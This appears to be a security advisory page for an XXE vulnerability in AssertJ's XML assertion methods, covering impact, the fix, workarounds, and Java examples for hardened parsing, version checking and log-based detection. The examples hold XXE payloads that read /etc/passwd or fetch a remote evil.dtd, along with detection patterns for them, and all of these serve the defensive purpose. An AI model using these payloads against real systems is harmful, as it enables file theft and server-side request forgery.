CVE-2026-24400

9.1 CRITICAL

📋 TL;DR

This XML External Entity (XXE) vulnerability in AssertJ lets an attacker who controls the XML handed to an affected method read files accessible to the JVM process, make the server issue requests to internal or external hosts (SSRF), or exhaust the parser (denial of service). AssertJ versions 1.4.0 through 3.27.6 are affected when the isXmlEqualTo(CharSequence) assertion or XmlStringPrettyFormatter.xmlPrettyFormat(String) is given attacker-controlled XML. AssertJ is a test-assertion library and is normally on the test classpath only; the risk is real only where an application ships it in production code and feeds it untrusted XML.

💻 Affected Systems

Products:
  • AssertJ
Versions: 1.4.0 through 3.27.6
Operating Systems: All platforms running Java/JVM
Default Config Vulnerable: ⚠️ Yes
Notes: Only vulnerable when using isXmlEqualTo(CharSequence) or XmlStringPrettyFormatter.xmlPrettyFormat(String) with untrusted XML input.

📦 What is this software?

AssertJ is an open-source Java library of fluent assertions (assertThat(...).isEqualTo(...)) used mainly in unit and integration tests; assertj-core is the affected artifact. Its isXmlEqualTo assertion and XmlStringPrettyFormatter parse XML with a DOM parser in order to compare or pretty-print it, which is where the external-entity handling comes in.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Disclosure of any file readable by the JVM process (e.g., /etc/passwd, application configuration holding credentials), SSRF against internal services reachable from the application server, and denial of service through entity expansion. Leaked credentials or internal-service access can then be used to pivot further into the environment.

🟠

Likely Case

Local file disclosure of application configuration or system files, potentially leading to credential theft or further exploitation.

🟢

If Mitigated

No impact if untrusted XML never reaches the affected methods, or if AssertJ is present only on the test classpath and not in deployed code.

🌐 Internet-Facing: HIGH if application accepts XML input from external sources and uses affected methods.
🏢 Internal Only: MEDIUM if XML processing occurs internally with potentially malicious content.

🎯 Exploit Status

Public PoC: ❌ No
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes (if the XML input path is reachable without authentication)
Complexity: LOW

XXE exploitation is well documented and needs little skill: a crafted XML document whose DOCTYPE declares an external entity is enough, so the absence of a public PoC offers no protection.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.27.7

Vendor Advisory: https://github.com/assertj/assertj/security/advisories/GHSA-rqfh-9r24-8c9r

Restart Required: Yes

Instructions:

1. Update the AssertJ dependency (assertj-core) to version 3.27.7 or later.
2. Replace uses of the deprecated isXmlEqualTo with XMLUnit assertions.
3. Rebuild and restart the application so the new jar is loaded.

🔧 Temporary Workarounds

Disable vulnerable methods (all platforms): avoid using isXmlEqualTo(CharSequence) or XmlStringPrettyFormatter with any untrusted input.

Input validation (all platforms): reject XML that contains a DOCTYPE declaration before it reaches the affected methods. Parse it first with a hardened DocumentBuilderFactory (disallow-doctype-decl enabled, external entities disabled) rather than relying on string filtering, which is easy to bypass.

JVM-level restriction (all platforms; added here, not taken from the vendor advisory): assuming AssertJ obtains its parser from the JDK's default DocumentBuilderFactory, starting the JVM with -Djavax.xml.accessExternalDTD= (empty value) makes the JDK parser refuse external DTD and external entity fetches over file:, http: and other protocols. This does not stop entity-expansion denial of service and has no effect if a third-party XML parser implementation is on the classpath.

🧯 If You Can't Patch

  • Replace all uses of isXmlEqualTo(CharSequence) with XMLUnit assertions
  • Do not strip DTDs with string replacement: parse untrusted XML with a DocumentBuilderFactory that has disallow-doctype-decl enabled and external entities disabled, and pass only the resulting document (or its re-serialized form) to any downstream code
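The following is an added example, not code from the AssertJ project or the advisory; it shows the application-side change described under "Official Fix" (step 2) and "If You Can't Patch". It assumes org.assertj:assertj-core (an affected version, used only by the vulnerable method kept for contrast) and org.xmlunit:xmlunit-core 2.x on the classpath. Both XML strings are parsed by a builder that rejects any DOCTYPE, so XMLUnit only ever diffs DOM trees and never touches the raw text:

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;
import org.xmlunit.builder.DiffBuilder;
import org.xmlunit.diff.Diff;

import static org.assertj.core.api.Assertions.assertThat;

/** Added example (not AssertJ project code). Assumes assertj-core and xmlunit-core on the classpath. */
public final class SafeXmlCompare {

    /** Parser that cannot be abused for XXE: any DOCTYPE is rejected outright, and external
     *  entities / external DTD loading are disabled as defence in depth. */
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    /** Parses XML with the hardened builder; throws SAXParseException on any DOCTYPE. */
    static Document parseHardened(String xml) throws Exception {
        return hardenedBuilder().parse(new InputSource(new StringReader(xml)));
    }

    /** VULNERABLE pattern: untrusted XML flows straight into AssertJ's own parser. */
    static void vulnerableCompare(String untrustedXml, String expectedXml) {
        assertThat(untrustedXml).isXmlEqualTo(expectedXml);
    }

    /** Hardened replacement: both sides are parsed by our builder; XMLUnit only diffs the trees. */
    static boolean safeXmlEqual(String untrustedXml, String expectedXml) throws Exception {
        Document actual = parseHardened(untrustedXml);
        Document expected = parseHardened(expectedXml);
        Diff diff = DiffBuilder.compare(expected).withTest(actual)
                .ignoreWhitespace().checkForSimilar().build();
        return !diff.hasDifferences();
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs for the demonstration.
        String expected = "<order><id>42</id></order>";
        String benign   = "<order>\n  <id>42</id>\n</order>";
        // Classic XXE payload shape: a permissive parser would resolve the entity and read the file.
        String xxe = "<!DOCTYPE order [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>"
                   + "<order><id>&xxe;</id></order>";

        System.out.println("benign equal: " + safeXmlEqual(benign, expected));
        try {
            safeXmlEqual(xxe, expected);
            System.out.println("UNEXPECTED: XXE payload was parsed");
        } catch (SAXParseException e) {
            // disallow-doctype-decl fires before any entity could be resolved
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The vulnerableCompare method is kept only to show the call shape that must go; the fix is to never let attacker-controlled text reach a parser you do not configure yourself. Parsing the expected document with the same hardened builder costs nothing and keeps a single parser configuration to audit.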

🔍 How to Verify

Check if Vulnerable:

Check the resolved version of assertj-core in every module (1.4.0 through 3.27.6 is affected) and search the code base for isXmlEqualTo( and XmlStringPrettyFormatter.xmlPrettyFormat(. Then check whether any hit sits in production (non-test) source and whether the dependency is on the runtime classpath; test-only usage is not reachable by an external attacker.

Check Version:

Maven: mvn dependency:tree -Dincludes=org.assertj:assertj-core (the output also shows the scope; a test-scope entry is not on the production classpath)
Gradle: gradle dependencies | grep assertj

Verify Fix Applied:

Verify AssertJ version is 3.27.7+ and deprecated methods have been replaced with XMLUnit
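As an added example (not from the page or the AssertJ project), the check above expressed in code: a small scanner that takes mvn dependency:tree or gradle dependencies output, picks out assertj-core, compares its version against the affected range, and reports whether the scope puts the jar on the production classpath. The tree lines in main() are constructed for the demonstration; the program assumes Maven's groupId:artifactId:type[:classifier]:version[:scope] layout and Gradle's "declared -> resolved" arrow.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Added example (not AssertJ or advisory code): is assertj-core affected, and is it reachable at runtime? */
public final class AssertjExposureCheck {

    static final String FIRST_AFFECTED = "1.4.0";
    static final String FIXED = "3.27.7";

    // A Maven/Gradle coordinate for assertj-core up to the next whitespace.
    static final Pattern COORD = Pattern.compile("org\\.assertj:assertj-core(?::[^\\s:]+)+");
    static final Pattern VERSION = Pattern.compile("\\d+(?:\\.\\d+)*(?:-[\\w.]+)?");
    // Gradle prints the resolved version after "->" when it differs from the declared one.
    static final Pattern ARROW = Pattern.compile("->\\s*(\\d+(?:\\.\\d+)*(?:-[\\w.]+)?)");

    record Finding(String version, String scope, boolean affected, boolean runtimeReachable) {}

    /** Numeric compare of dotted versions; qualifiers such as -SNAPSHOT are ignored. */
    static int compareVersions(String a, String b) {
        String[] pa = a.split("-", 2)[0].split("\\.");
        String[] pb = b.split("-", 2)[0].split("\\.");
        int n = Math.max(pa.length, pb.length);
        for (int i = 0; i < n; i++) {
            int x = i < pa.length ? Integer.parseInt(pa[i]) : 0;
            int y = i < pb.length ? Integer.parseInt(pb[i]) : 0;
            if (x != y) return Integer.compare(x, y);
        }
        return 0;
    }

    /** Affected range from the advisory summary: 1.4.0 <= version < 3.27.7. */
    static boolean isAffected(String version) {
        return compareVersions(version, FIRST_AFFECTED) >= 0 && compareVersions(version, FIXED) < 0;
    }

    static List<Finding> scan(List<String> treeLines) {
        List<Finding> out = new ArrayList<>();
        for (String line : treeLines) {
            Matcher m = COORD.matcher(line);
            if (!m.find()) continue;
            String[] parts = m.group().split(":");
            String version = null;
            String scope = "unspecified";          // Gradle puts the configuration in a header, not the line
            for (int i = 2; i < parts.length; i++) {
                if (version == null && VERSION.matcher(parts[i]).matches()) version = parts[i];
                else if (version != null) scope = parts[i];   // Maven: the token after the version is the scope
            }
            Matcher arrow = ARROW.matcher(line);
            if (arrow.find()) version = arrow.group(1);
            if (version == null) continue;
            // Only "test" scope is definitely absent at runtime; anything else is treated as reachable
            // (conservative: "provided" depends on what the container supplies).
            out.add(new Finding(version, scope, isAffected(version), !scope.equals("test")));
        }
        return out;
    }

    public static void main(String[] args) {
        List<String> sample = List.of(     // constructed tree output for the demonstration
            "[INFO] +- org.assertj:assertj-core:jar:3.27.6:test",
            "[INFO] +- org.assertj:assertj-core:jar:3.26.3:compile",
            "[INFO] +- org.assertj:assertj-core:jar:3.27.7:compile",
            "+--- org.assertj:assertj-core:3.26.3 -> 3.27.7"
        );
        for (Finding f : scan(sample)) {
            String verdict = !f.affected() ? "fixed"
                           : f.runtimeReachable() ? "AFFECTED and on runtime classpath"
                           : "affected but test-scope only";
            System.out.println(f.version() + " (" + f.scope() + "): " + verdict);
        }
    }
}
```

A test-scope hit still deserves the upgrade, since the same code may later be promoted to production, but it is not an exposure that needs emergency handling.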

📡 Detection & Monitoring

Log Indicators:

  • Parser exceptions (SAXParseException) raised from XmlStringPrettyFormatter or isXmlEqualTo whose message mentions DOCTYPE, ENTITY or an external identifier; request bodies logged at the input layer that contain a DOCTYPE declaration
  • A successful XXE produces no parse error: the entity resolves and the comparison simply passes or fails, so application logs alone are not a reliable signal

Network Indicators:

  • Outbound HTTP/HTTPS, FTP or DNS requests from the application server to internal services or to hosts it never contacts otherwise (out-of-band exfiltration), shortly after an XML request was received
  • Host-level file reads of /etc/passwd or configuration files by the JVM process (auditd, EDR), which file:// entities trigger

SIEM Query:

source="application.logs" AND ("file://" OR "ENTITY" OR "DOCTYPE") AND "XmlStringPrettyFormatter"

This query only matches when the parser logged an error or the raw XML was logged; pair it with egress monitoring on the application host.
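The detection logic behind that query, as an added example (not from the page or AssertJ): a pass over application log lines that pulls the external-entity URI out of any logged DTD, distinguishes a local file read from an SSRF or out-of-band fetch, and flags DOCTYPE-related parser errors from the affected AssertJ methods as a weaker signal. The log lines in main() are constructed for the demonstration; the fourth carries the message the JDK parser emits when a hardened application rejects a DOCTYPE.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Added example (not AssertJ or advisory code): XXE indicators in application log lines. */
public final class XxeLogScan {

    record Alert(String severity, String reason, String entityUri, String line) {}

    // External identifier in an entity declaration: <!ENTITY name SYSTEM "uri"> or
    // <!ENTITY % name PUBLIC "id" "uri">; group 1 is the URI the parser would fetch.
    static final Pattern EXTERNAL_ENTITY = Pattern.compile(
        "<!ENTITY\\s+%?\\s*\\w+\\s+(?:SYSTEM\\s+|PUBLIC\\s+\"[^\"]*\"\\s+)\"([^\"]+)\"");
    static final Pattern DOCTYPE = Pattern.compile("DOCTYPE", Pattern.CASE_INSENSITIVE);
    static final Pattern AFFECTED_PATH = Pattern.compile(
        "SAXParseException|XmlStringPrettyFormatter|isXmlEqualTo");

    static List<Alert> scan(List<String> lines) {
        List<Alert> alerts = new ArrayList<>();
        for (String line : lines) {
            Matcher ent = EXTERNAL_ENTITY.matcher(line);
            if (ent.find()) {
                String uri = ent.group(1);
                String reason = uri.startsWith("file:")
                    ? "external entity reads a local file"
                    : "external entity fetches a remote resource (SSRF / out-of-band exfiltration)";
                alerts.add(new Alert("HIGH", reason, uri, line));
            } else if (DOCTYPE.matcher(line).find() && AFFECTED_PATH.matcher(line).find()) {
                // A DTD reached the affected parsing path, but no external entity is visible on this line.
                alerts.add(new Alert("MEDIUM", "DOCTYPE handled by affected AssertJ XML path", null, line));
            }
        }
        return alerts;
    }

    public static void main(String[] args) {
        List<String> sample = List.of(   // constructed log lines for the demonstration
            "2026-02-03T10:15:01Z INFO  OrderImport - comparing payload <order><id>42</id></order>",
            "2026-02-03T10:15:07Z WARN  OrderImport - comparing payload <!DOCTYPE o [<!ENTITY x SYSTEM \"file:///etc/passwd\">]><order><id>&x;</id></order>",
            "2026-02-03T10:15:09Z WARN  OrderImport - comparing payload <!DOCTYPE o [<!ENTITY % p SYSTEM \"http://10.0.0.5/evil.dtd\"> %p;]><order/>",
            "2026-02-03T10:15:12Z ERROR OrderImport - isXmlEqualTo failed: org.xml.sax.SAXParseException; DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true."
        );
        for (Alert a : scan(sample)) {
            System.out.println(a.severity() + ": " + a.reason()
                + (a.entityUri() == null ? "" : " -> " + a.entityUri()));
        }
    }
}
```

On the constructed sample the first line produces nothing, the second and third produce HIGH alerts (a file read and a remote parameter-entity fetch), and the fourth produces a MEDIUM alert. The HIGH path depends on the raw payload being logged somewhere; if it is not, only the MEDIUM path and network telemetry remain.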
